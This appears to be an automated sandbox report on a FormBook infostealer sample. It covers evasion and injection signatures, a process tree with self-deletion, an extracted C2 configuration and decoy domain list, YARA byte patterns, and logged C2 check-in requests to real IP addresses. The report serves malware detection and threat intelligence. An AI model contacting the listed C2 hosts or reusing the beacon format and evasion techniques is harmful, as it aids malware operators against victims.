Loading ...

Play interactive tourEdit tour

Windows Analysis Report CtTYTpaAKA.exe

Overview

General Information

Sample Name:CtTYTpaAKA.exe
Analysis ID:510401
MD5:4a640b5abfd52dc70eb962bf9f250714
SHA1:19433ceeaae0f6b678f77e8494a39de9e9d4f870
SHA256:0e636b89393a1581a2e3f4b141c9886bed9c77969569605cdb44b78d94127802
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • CtTYTpaAKA.exe (PID: 7140 cmdline: 'C:\Users\user\Desktop\CtTYTpaAKA.exe' MD5: 4A640B5ABFD52DC70EB962BF9F250714)
    • CtTYTpaAKA.exe (PID: 5784 cmdline: C:\Users\user\Desktop\CtTYTpaAKA.exe MD5: 4A640B5ABFD52DC70EB962BF9F250714)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cscript.exe (PID: 5360 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 6600 cmdline: /c del 'C:\Users\user\Desktop\CtTYTpaAKA.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.esyscoloradosprings.com/fqiq/"], "decoy": ["driventow.com", "ipatchwork.today", "bolder.equipment", "seal-brother.com", "mountlaketerraceapartments.com", "weeden.xyz", "sanlifalan.com", "athafood.com", "isshinn1.com", "creationslazzaroni.com", "eclecticrenaissancewoman.com", "satellitephonstore.com", "cotchildcare.com", "yamacorp.digital", "ff4cuno43.xyz", "quicksticks.community", "govindfinance.com", "farmersfirstseed.com", "megacinema.club", "tablescaperendezvous4two.com", "ecarehomes.com", "floaterslaser.com", "benisano.com", "saint444.com", "thedusi.com", "avafxtrade.online", "hanenosuke.com", "suntioil4u.com", "healthyweekendtips.com", "24000words.com", "ofbchina.net", "begukiu0.info", "wolmoda.com", "mask60.com", "4bellemaison.com", "mambacustomboats.com", "sedsn.com", "doggycc.com", "kangrungao.com", "pharmacistcharisma.com", "passiverewardssystems.com", "qywyfeo8.xyz", "shenjiclass.com", "rdoi.top", "lavishbynovell.com", "fleetton.com", "hillcresthomegroup.com", "hartfulcleaning.com", "srofkansas.com", "applebroog.industries", "phillytrainers.com", "dmc--llc.com", "sosoon.store", "daysyou.com", "controldatasa.com", "markarge.com", "hirayaawards.com", "clinicscluster.com", "sophiagunterman.art", "kirtansangeet.com", "residential.insure", "ribbonofficial.com", "qianhaijcc.com", "fytvankin.quest"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0xac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x6ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x6bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x6b18:$sqlite3text: 68 38 2A 90 C5
    • 0x6c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x6b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x6c53:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 30 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.CtTYTpaAKA.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.CtTYTpaAKA.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.CtTYTpaAKA.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
        • 0x15d18:$sqlite3text: 68 38 2A 90 C5
        • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
        5.0.CtTYTpaAKA.exe.400000.4.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.0.CtTYTpaAKA.exe.400000.4.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 23 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.esyscoloradosprings.com/fqiq/"], "decoy": ["driventow.com", "ipatchwork.today", "bolder.equipment", "seal-brother.com", "mountlaketerraceapartments.com", "weeden.xyz", "sanlifalan.com", "athafood.com", "isshinn1.com", "creationslazzaroni.com", "eclecticrenaissancewoman.com", "satellitephonstore.com", "cotchildcare.com", "yamacorp.digital", "ff4cuno43.xyz", "quicksticks.community", "govindfinance.com", "farmersfirstseed.com", "megacinema.club", "tablescaperendezvous4two.com", "ecarehomes.com", "floaterslaser.com", "benisano.com", "saint444.com", "thedusi.com", "avafxtrade.online", "hanenosuke.com", "suntioil4u.com", "healthyweekendtips.com", "24000words.com", "ofbchina.net", "begukiu0.info", "wolmoda.com", "mask60.com", "4bellemaison.com", "mambacustomboats.com", "sedsn.com", "doggycc.com", "kangrungao.com", "pharmacistcharisma.com", "passiverewardssystems.com", "qywyfeo8.xyz", "shenjiclass.com", "rdoi.top", "lavishbynovell.com", "fleetton.com", "hillcresthomegroup.com", "hartfulcleaning.com", "srofkansas.com", "applebroog.industries", "phillytrainers.com", "dmc--llc.com", "sosoon.store", "daysyou.com", "controldatasa.com", "markarge.com", "hirayaawards.com", "clinicscluster.com", "sophiagunterman.art", "kirtansangeet.com", "residential.insure", "ribbonofficial.com", "qianhaijcc.com", "fytvankin.quest"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: CtTYTpaAKA.exeVirustotal: Detection: 13%Perma Link
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.CtTYTpaAKA.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.CtTYTpaAKA.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.CtTYTpaAKA.exe.3b15be0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.CtTYTpaAKA.exe.3acb9c0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.354912343.00000000012B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.341621895.000000000FAD4000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.296512785.00000000039A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.293661592.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.557804622.00000000007B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.293144075.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.557379114.00000000005B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.354450350.0000000000F40000.00000040.00020000.sdmp, type: MEMORY
          Source: 5.0.CtTYTpaAKA.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.2.CtTYTpaAKA.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.CtTYTpaAKA.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.CtTYTpaAKA.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: CtTYTpaAKA.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: CtTYTpaAKA.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cscript.pdbUGP source: CtTYTpaAKA.exe, 00000005.00000002.355160029.0000000001330000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: CtTYTpaAKA.exe, 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, cscript.exe, 0000000A.00000002.559915129.0000000004710000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: CtTYTpaAKA.exe, cscript.exe
          Source: Binary string: cscript.pdb source: CtTYTpaAKA.exe, 00000005.00000002.355160029.0000000001330000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop ebx

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49789 -> 203.170.80.253:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49789 -> 203.170.80.253:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49789 -> 203.170.80.253:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49816 -> 108.167.135.122:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49816 -> 108.167.135.122:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49816 -> 108.167.135.122:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49820 -> 116.212.126.191:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49820 -> 116.212.126.191:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49820 -> 116.212.126.191:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.216.2 80
          Source: C:\Windows\explorer.exeDomain query: www.rdoi.top
          Source: C:\Windows\explorer.exeNetwork Connect: 156.240.150.22 80
          Source: C:\Windows\explorer.exeNetwork Connect: 18.118.119.183 80
          Source: C:\Windows\explorer.exeDomain query: www.isshinn1.com
          Source: C:\Windows\explorer.exeDomain query: www.sosoon.store
          Source: C:\Windows\explorer.exeDomain query: www.24000words.com
          Source: C:\Windows\explorer.exeDomain query: www.creationslazzaroni.com
          Source: C:\Windows\explorer.exeDomain query: www.healthyweekendtips.com
          Source: C:\Windows\explorer.exeNetwork Connect: 45.93.101.51 80
          Source: C:\Windows\explorer.exeDomain query: www.esyscoloradosprings.com
          Source: C:\Windows\explorer.exeNetwork Connect: 157.7.107.193 80
          Source: C:\Windows\explorer.exeDomain query: www.passiverewardssystems.com
          Source: C:\Windows\explorer.exeNetwork Connect: 108.167.135.122 80
          Source: C:\Windows\explorer.exeNetwork Connect: 203.170.80.253 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 104.233.161.241 80
          Source: C:\Windows\explorer.exeDomain query: www.megacinema.club
          Source: C:\Windows\explorer.exeDomain query: www.thedusi.com
          Performs DNS queries to domains with low reputationShow sources
          Source: DNS query: www.qywyfeo8.xyz
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.esyscoloradosprings.com/fqiq/
          Source: Joe Sandbox ViewASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /fqiq/?7ntl=P0DdOFE&t4=e+AZlQHvj0Nkc3ZxJNwaiuJVmPOcAOQ1LYKBIXTaam/aWkR0DWWiTlTQ8bI2AJlImQfa HTTP/1.1Host: www.isshinn1.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?t4=DrMAfIISwi8U79fOFtAc8vb7WUYlKccaGhxOihVWZlb0OyUiTIjpechuj+pZJYn+REB0&7ntl=P0DdOFE HTTP/1.1Host: www.rdoi.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?7ntl=P0DdOFE&t4=VbjQ+CrtVqSc6MjyqwiIrbcVi4OLgBoaswazXZOO5Xcx+UM7PWGlfM9NMvQxrE1YfGIg HTTP/1.1Host: www.megacinema.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?t4=S7zufRYckdaRFFMeU2i8sPw6oODMRAGo5BePfs9LVZnwdcptwuHxEcdCnQUJ/1YT2L5I&7ntl=P0DdOFE HTTP/1.1Host: www.passiverewardssystems.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?7ntl=P0DdOFE&t4=37G2EJO5ajdFCPilMv01MVSoTtyG1cwu/oJiLg0B75A/3Z+IhDAr8cszuRbw5Svr7Hw7 HTTP/1.1Host: www.sosoon.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?t4=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8PStfGU22/Dk&7ntl=P0DdOFE HTTP/1.1Host: www.esyscoloradosprings.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?t4=iMQAtVYJ5rSxYH2x6+rXrM9PD6xR/OhOVeuwgCEnac3/UPHz+dInplYvIFxL5JBy9ykq&7ntl=P0DdOFE HTTP/1.1Host: www.24000words.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?7ntl=P0DdOFE&t4=nFNrhldUoBq3vLmHBw1UbSwwpktYb/50pHGi08ob/NjKnaohHgqGQwabDGB1W4+ZaPC+ HTTP/1.1Host: www.healthyweekendtips.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?7ntl=P0DdOFE&t4=t9SsZ/MS+FgAljVT/evJl5FFrjjg4DD8GLJQPa9p2h0JK2Hk2yZve+gJxH10C5UF88V/ HTTP/1.1Host: www.thedusi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 108.167.135.122 108.167.135.122
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Oct 2021 17:14:13 GMTContent-Type: text/htmlContent-Length: 19220Connection: closeServer: ApacheLast-Modified: Mon, 23 Jul 2018 06:31:26 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Oct 2021 17:14:19 GMTServer: ApacheContent-Length: 258Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 64 6f 69 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.rdoi.top Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmllast-modified: Tue, 09 Jul 2019 06:18:14 GMTetag: "999-5d2431a6-22b54e502ae80759;;;"accept-ranges: bytescontent-length: 2457date: Wed, 27 Oct 2021 17:14:25 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 